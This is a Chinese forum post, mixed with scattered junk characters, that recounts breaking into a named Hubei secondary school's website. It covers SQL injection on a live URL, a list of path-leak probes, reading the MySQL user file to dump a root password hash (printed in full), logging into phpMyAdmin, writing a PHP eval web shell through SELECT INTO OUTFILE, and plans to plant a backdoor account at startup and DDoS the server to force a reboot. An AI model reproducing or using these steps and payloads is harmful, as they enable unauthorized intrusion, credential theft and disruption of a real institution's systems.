友情检测湖北省大治市第一中学

admin

第一眼看去，好像全是html静态的，都知道静态的根本不好日，多点击几个专栏
  u( }1 z5 |* i' @# G; t发现这个：http://www.dyyz.net.cn/celebrate/list.php?id=3  -0  -1 判断后确认存在注入！
; u$ }' w. F" f/ t3 @
4 |, g/ f2 Y. d# z% ]7 h7 c
1 n. G: x$ ?3 X9 p+ Z( T
& [3 k# ?4 M+ A4 G5 u1 s; q# d常规手工不行，尝试突破也不行，利用穿山甲 可以注入：root权限
* o2 \/ n- H6 Y9 z% k
9 E( h8 f1 v: @# K! V. n* Z那么想可以直接写入shell ，getshell有几个条件：
1 C3 F# G$ @: A; Q3 S

1、知道站点物理路径

2、有足够大的权限

3、magic_quotes_gpc()=OFF
) I/ K% S0 e, e2 C, I  R
8 _! M6 o  _4 Y4 s试着爆绝对路径：
6 ~8 P- i! V* |% H1./phpMyAdmin/index.php?lang[]=1  
& k) u4 X* U1 ]% A+ Y2 P. ]2./phpMyAdmin/phpinfo.php  
& M8 I- J2 S8 X/ t7 Z) F3./load_file()  
4./phpmyadmin/themes/darkblue_orange/layout.inc.php  
5./phpmyadmin/libraries/select_lang.lib.php  
6./phpmyadmin/libraries/lect_lang.lib.php  
: [, |3 U9 ~" C% ?9 D7./phpmyadmin/libraries/mcrypt.lib.php   
8./phpmyadmin/libraries/export/xls.php  

均不行...........................
6 r! {3 K9 _9 h
6 ^" C- n, s$ T御剑扫到这个：http://www.dyyz.net.cn//phpinfo.php       获得网站路径：D:/www/phpinfo.php
: ~8 M$ c: F$ h0 j0 ]6 ?. V
权限为root，知道网站路径，可是条件3不符合，没法写入shell ，不过服务器存在phpmyadmin

* u% M  K8 t, e; E  T默认不行，尝试万能密码：帐号 'localhost'@'@" 密码空 ，登录失败

6 t4 M+ _0 O! s2 q6 T- ^* q0 P* U敏感东西：http://202.103.49.66/Admincp.php  社工进不去...........
8 a7 x$ E5 m; }4 i; G8 [9 G
1 d3 @) @) ]2 ^3 U想想root还可以读，读到root密码进phpmyadmin 也可以拿shell
) ?& W1 P& D: o* |
5 N( ^4 P3 i0 G+ C2 ]http://www.dyyz.net.cn//phpinfo.php  泄露了D:\phpStudy\PHP5\php.ini

7 g0 ?) d! Z" @" }/ M' c* l自己修改好读root密码的路径：D:\phpStudy\MySQL\Data\mysql\user.MYD

成功读到root密码：

4 b4 h) T+ c# S% r17---- r(0072)
18---- o(006f)
* }/ j' v* s( c19---- o(006f)
20---- t(0074)
21---- *(002a)
5 t) H7 c. s" k" k+ J$ o' a+ I22---- 8(0038)
23---- 2(0032)
* S; |, H) O; Z24---- E(0045)
& T8 R% T& n" a& c. `25---- 1(0031)
) D* J9 y" X/ ]7 y. c$ @26---- C(0043)
27---- 5(0035)
5 @7 B) [$ X8 o/ v  G+ w28---- 8(0038)
0 o0 n5 e% Y$ G3 X4 B1 u29---- 2(0032)
' h6 B8 ~& F) |  Z30---- 8(0038)
! s$ k! \2 Y; t31---- A(0041)
32---- 9(0039)
33---- B(0042)
$ a# k; [& J) A( M34---- 5(0035)
35---- 4(0034)
1 F1 x* W* c; C0 P5 x36---- 8(0038)
37---- 6(0036)
( O$ m1 _! d, h. ?- c/ l38---- 4(0034)
39---- 9(0039)
. t) S  Z$ ]. A40---- 1(0031)
41---- 1(0031)
42---- 5(0035)
43---- 3(0033)
1 V( [( R% y% L/ z# b44---- 5(0035)
45---- 9(0039)
46---- 8(0038)
47---- F(0046)
48---- F(0046)
49---- 4(0034)
7 Z+ }+ h- c; b. I50---- F(0046)
) M% n. H5 z$ y6 D& v1 p1 b5 r51---- 0(0030)
52---- 3(0033)
$ b+ N8 L1 s" a# I: S2 I: Q53---- 2(0032)
+ J: L0 w, P, w; d6 J3 W& s54---- A(0041)
55---- 4(0034)
8 B2 ?' ^- M1 v56---- A(0041)
% @4 f! N( m5 N5 b5 P57---- B(0042)
" S( R) A  X- O% T9 o* v58---- *(0044)
59---- *(0035)
* s  h( \6 _; T! ?# a' m60---- *(0041)
2 P4 }; L4 Z* g3 q' b61---- *0032)
% {" |; m! J! G
解密后成功登陆phpmyamin
                          
8 S" p- Z+ z+ X! _* L
6 H+ c3 k2 d  w, X" ]7 N2 B2 D- @                             
1 e5 b2 @; f' O9 m7 S7 M
找到mysql数据库，执行sql语句：elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
& f+ L& k  i8 _. M( K
- B; n3 u9 ?  X$ O( o0 d成功执行，拿下shell，菜刀连接：

" z/ a6 h, H  C3 n$ h" K3 ~服务器不支持asp,aspx,php提权无果...................

但服务器权限很松，上传个远控小马或是一个添加用户的vbs程序到启动里：

服务器上已经有个隐藏帐号了

  e: m0 u4 u4 O7 R1 J# h

别名     administrators
注释     管理员对计算机/域有不受限制的完全访问权

成员

-------------------------------------------------------------------------------
  I! [7 O" L1 U2 S* Yadmin
+ ?# _. O1 ?0 S* [& B# Y  U7 fAdministrator
slipper$
sqluser
命令成功完成。

服务器权限很松，上传个vbs添加用户的到启动，不要用bat，会开机的时候显示运行批处理的。
% v+ ]5 X# n9 l8 n( v! X
# [, s9 Q5 }9 F) m) ]2 `3 kddos服务器重启，不然就只能坐等服务器重启了...............................

: @2 H1 b( _% z( |3 A" I/ X      

" m6 {! Z- H9 B

angel